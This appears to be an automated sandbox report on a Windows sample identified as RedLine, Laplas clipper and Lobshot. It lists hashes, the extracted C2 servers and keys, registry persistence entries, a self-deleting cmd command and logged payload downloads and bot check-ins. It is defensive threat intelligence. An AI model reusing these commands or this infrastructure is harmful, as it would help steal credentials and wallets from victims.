laplas | 1d38b7669f2dcddcf429fef7dc3e37f613caffb8794f1b923b753ac6a38e4094

Analysis

max time kernel
138s
max time network
149s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
17/06/2023, 10:09 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f8.exe
Size

254KB
MD5

2610a0ddbea9da2319bda1005b9c26c9
SHA1

bd0abf0e85dbb443790134d31f82f7bb287c8120
SHA256

1d38b7669f2dcddcf429fef7dc3e37f613caffb8794f1b923b753ac6a38e4094
SHA512

307b95c9091a9181aca5cbddbf5c00ca78c7c16e8e85741952d352d415be482f144bbe2e48af384d39c0f414cde3dd21a6f3697bf8bcb23687511540046f77a3
SSDEEP

3072:YlRbncDRcLjlRbHrvUgxLx4kgKPsbGgOOZrce/a0G0zWgAiJQS2kOuZmVeDkgPxe:GBnyGlRkgxLxYT1dcktG03QS2mEVeQn

Score

10^/10

laplas lobshot redline @ididjsjsid backdoor clipper discovery infostealer persistence spyware stealer

Malware Config

Extracted

Family

redline

Botnet

@ididjsjsid

94.142.138.4:80

Attributes

auth_value
ff1308093e68aa6b7353aa8595fa3e75

Extracted

Family

laplas

http://185.223.93.251

Attributes

api_key
f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

Detects Lobshot family 7 IoCs

resource	yara_rule
behavioral1/files/0x000900000001233d-70.dat	family_lobshot
behavioral1/files/0x000900000001233d-73.dat	family_lobshot
behavioral1/files/0x000900000001233d-75.dat	family_lobshot
behavioral1/files/0x00070000000126b5-76.dat	family_lobshot
behavioral1/files/0x00070000000126b5-78.dat	family_lobshot
behavioral1/files/0x00070000000126b5-79.dat	family_lobshot
behavioral1/files/0x00070000000126b5-80.dat	family_lobshot

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Lobshot
Lobshot is a backdoor module written in c++.
backdoor lobshot
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
940	conhost.exe
1116	svchost.exe
1960	service.exe
1320	ntlhost.exe

Loads dropped DLL 6 IoCs

pid	Process
1556	f8.exe
1556	f8.exe
1556	f8.exe
760	cmd.exe
940	conhost.exe
940	conhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\Shell Extension = "C:\\ProgramData\\service.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	conhost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	9	Go-http-client/1.1

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1528	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1556	f8.exe
1556	f8.exe
1116	svchost.exe
1960	service.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1556	f8.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1556 wrote to memory of 940	1556	f8.exe	30
PID 1556 wrote to memory of 940	1556	f8.exe	30
PID 1556 wrote to memory of 940	1556	f8.exe	30
PID 1556 wrote to memory of 940	1556	f8.exe	30
PID 1556 wrote to memory of 1116	1556	f8.exe	31
PID 1556 wrote to memory of 1116	1556	f8.exe	31
PID 1556 wrote to memory of 1116	1556	f8.exe	31
PID 1556 wrote to memory of 1116	1556	f8.exe	31
PID 1116 wrote to memory of 760	1116	svchost.exe	32
PID 1116 wrote to memory of 760	1116	svchost.exe	32
PID 1116 wrote to memory of 760	1116	svchost.exe	32
PID 1116 wrote to memory of 760	1116	svchost.exe	32
PID 760 wrote to memory of 1528	760	cmd.exe	34
PID 760 wrote to memory of 1528	760	cmd.exe	34
PID 760 wrote to memory of 1528	760	cmd.exe	34
PID 760 wrote to memory of 1528	760	cmd.exe	34
PID 760 wrote to memory of 1960	760	cmd.exe	35
PID 760 wrote to memory of 1960	760	cmd.exe	35
PID 760 wrote to memory of 1960	760	cmd.exe	35
PID 760 wrote to memory of 1960	760	cmd.exe	35
PID 940 wrote to memory of 1320	940	conhost.exe	36
PID 940 wrote to memory of 1320	940	conhost.exe	36
PID 940 wrote to memory of 1320	940	conhost.exe	36

C:\Users\Admin\AppData\Local\Temp\f8.exe
"C:\Users\Admin\AppData\Local\Temp\f8.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1556
- C:\Users\Admin\AppData\Local\Temp\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:940
- - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    3⤵
    - Executes dropped EXE
    PID:1320
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c (ping 127.0.0.1) & (del /F /Q "C:\Users\Admin\AppData\Local\Temp\svchost.exe") & (start "" "C:\ProgramData\service.exe")
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:1528
  - - C:\ProgramData\service.exe
      "C:\ProgramData\service.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1960

Network

DNS

api.ip.sb

f8.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/ip

f8.exe

Remote address:

104.26.13.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 17 Jun 2023 10:09:29 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PYw83JTkVH5GfLS93KpWqPuEwHkI%2Fmx7OaP%2FFkfyHVbt2YMbxUSjdkmUZOue5pWC%2Ff2PoNw3mXJxEF4tBK7teP%2FA3BSRM9U%2FskgFbjwIvtKMbtBKZMqzn6fBXw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 7d8a7f50be59b939-AMS
alt-svc: h3=":443"; ma=86400
GET

http://104.193.254.97/conhost.exe

f8.exe

Remote address:

104.193.254.97:80

Request

GET /conhost.exe HTTP/1.1
Host: 104.193.254.97
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:09:37 GMT
Content-Type: application/octet-stream
Content-Length: 4212224
Last-Modified: Tue, 17 Jan 2023 06:44:46 GMT
Connection: keep-alive
ETag: "63c643de-404600"
Accept-Ranges: bytes
GET

http://104.193.254.97/svchost.exe

f8.exe

Remote address:

104.193.254.97:80

Request

GET /svchost.exe HTTP/1.1
Host: 104.193.254.97

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 81920
Last-Modified: Fri, 02 Dec 2022 16:47:52 GMT
Connection: keep-alive
ETag: "638a2c38-14000"
Accept-Ranges: bytes
GET

http://185.223.93.251/bot/regex

ntlhost.exe

Remote address:

185.223.93.251:80

Request

GET /bot/regex HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:09:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin

ntlhost.exe

Remote address:

185.223.93.251:80

Request

GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:09:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://185.223.93.251/bot/regex

ntlhost.exe

Remote address:

185.223.93.251:80

Request

GET /bot/regex HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:10:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin

ntlhost.exe

Remote address:

185.223.93.251:80

Request

GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Jun 2023 10:10:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive

94.142.138.4:80

http

f8.exe

5.3MB
21.4kB
3866
382
104.26.13.31:443

https://api.ip.sb/ip

tls, http

f8.exe

750 B
4.5kB
9
8

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
104.193.254.97:80

http://104.193.254.97/svchost.exe

http

f8.exe

73.8kB
4.4MB
1601
3791

HTTP Request

GET http://104.193.254.97/conhost.exe

HTTP Response

200

HTTP Request

GET http://104.193.254.97/svchost.exe

HTTP Response

200
193.149.180.212:443

https

service.exe

218 B
515 B
4
4
185.223.93.251:80

http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin

http

ntlhost.exe

1.1kB
2.9kB
11
14

HTTP Request

GET http://185.223.93.251/bot/regex

HTTP Response

200

HTTP Request

GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin

HTTP Response

200

HTTP Request

GET http://185.223.93.251/bot/regex

HTTP Response

200

HTTP Request

GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=THEQWNRW\Admin

HTTP Response

200
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

218 B
515 B
4
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4
193.149.180.212:443

https

service.exe

218 B
515 B
4
4
193.149.180.212:443

https

service.exe

264 B
515 B
5
4

8.8.8.8:53

api.ip.sb

dns

f8.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.13.31

104.26.12.31

172.67.75.172

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\service.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
C:\ProgramData\service.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
C:\ProgramData\service.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
C:\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
4.0MB

MD5
feccda803ece2e7a3b7e9798714ad47e

SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

Download Submit
C:\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
4.0MB

MD5
feccda803ece2e7a3b7e9798714ad47e

SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

Download Submit
C:\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
4.0MB

MD5
feccda803ece2e7a3b7e9798714ad47e

SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
565.6MB

MD5
712adba4c45002587c4d5ab50fc23253

SHA1
e1bbca4da86c26a1aeed2f0f2b5179a6854d120a

SHA256
74ccef2d2621110e3d3dab5486cad5dfa9e070e4de53cbb13fc8e8cc09277dd0

SHA512
a5c51d99b4f57794b4610f698c7639825665f34cf91339169f9722fc96b3f1b05e5553bc081ad5021072bac03fb93edabd898dab6047f7f1dea85ec5de7d96a0

Download Submit
\ProgramData\service.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
4.0MB

MD5
feccda803ece2e7a3b7e9798714ad47e

SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

Download Submit
\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
4.0MB

MD5
feccda803ece2e7a3b7e9798714ad47e

SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

Download Submit
\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
80KB

MD5
b8d23f55d8924b617a57035db1cd3eb0

SHA1
94f84b29f47762afa6f44b39dea910286381f296

SHA256
921db56e4de5605b3759de43727f62be0f4c158a2837cf08ff376c427b85bec8

SHA512
656c74a552e068e20f234a7f66fd49a2c2477b991385c563443856d0b1e7668cb79f839f06f846eed14cfb009dd0fb4b1ad9f96fd1d0313d38cfb6d213e68099

Download Submit
\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
714.0MB

MD5
28a583b6382656b35d56f11ba481484f

SHA1
8c5d531cf92b7e2d9ded0c9972aec06fdb328eba

SHA256
52c6d2cf66f9c987860469794aaed33f4ab2a21030d9724e103950abd0e46a58

SHA512
74ade3c9d4786d63c4914f1b90a98e76cbc4bc39232e449e1412452a26f130e2d5761a4c656622be32f36ae441e6687351cc0ec6f9f712655c78bf806c7d5aa1

Download Submit
\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
399.7MB

MD5
d697bee719c6f71fca5f32e7ef6bbe4f

SHA1
75d8247f567cbcf60433ef78e170fc637477107e

SHA256
8626a25b2b3ba8feefd34126fe93ec93a3c638e81a28837c60a5008b2eacbf98

SHA512
6196a162dec9c6fb2192519fe7f7ebe6eb0d45038fb73351fb57a9cc59584703f4b3a97ed9cb4e0604ab265f18bbe16ca480eae1c62287ffb629996752d880fe

Download Submit
memory/1556-54-0x0000000000240000-0x0000000000270000-memory.dmp

Filesize
192KB

Download
memory/1556-59-0x00000000047E0000-0x0000000004820000-memory.dmp

Filesize
256KB

Download
memory/1556-58-0x0000000001F80000-0x0000000001F86000-memory.dmp

Filesize
24KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.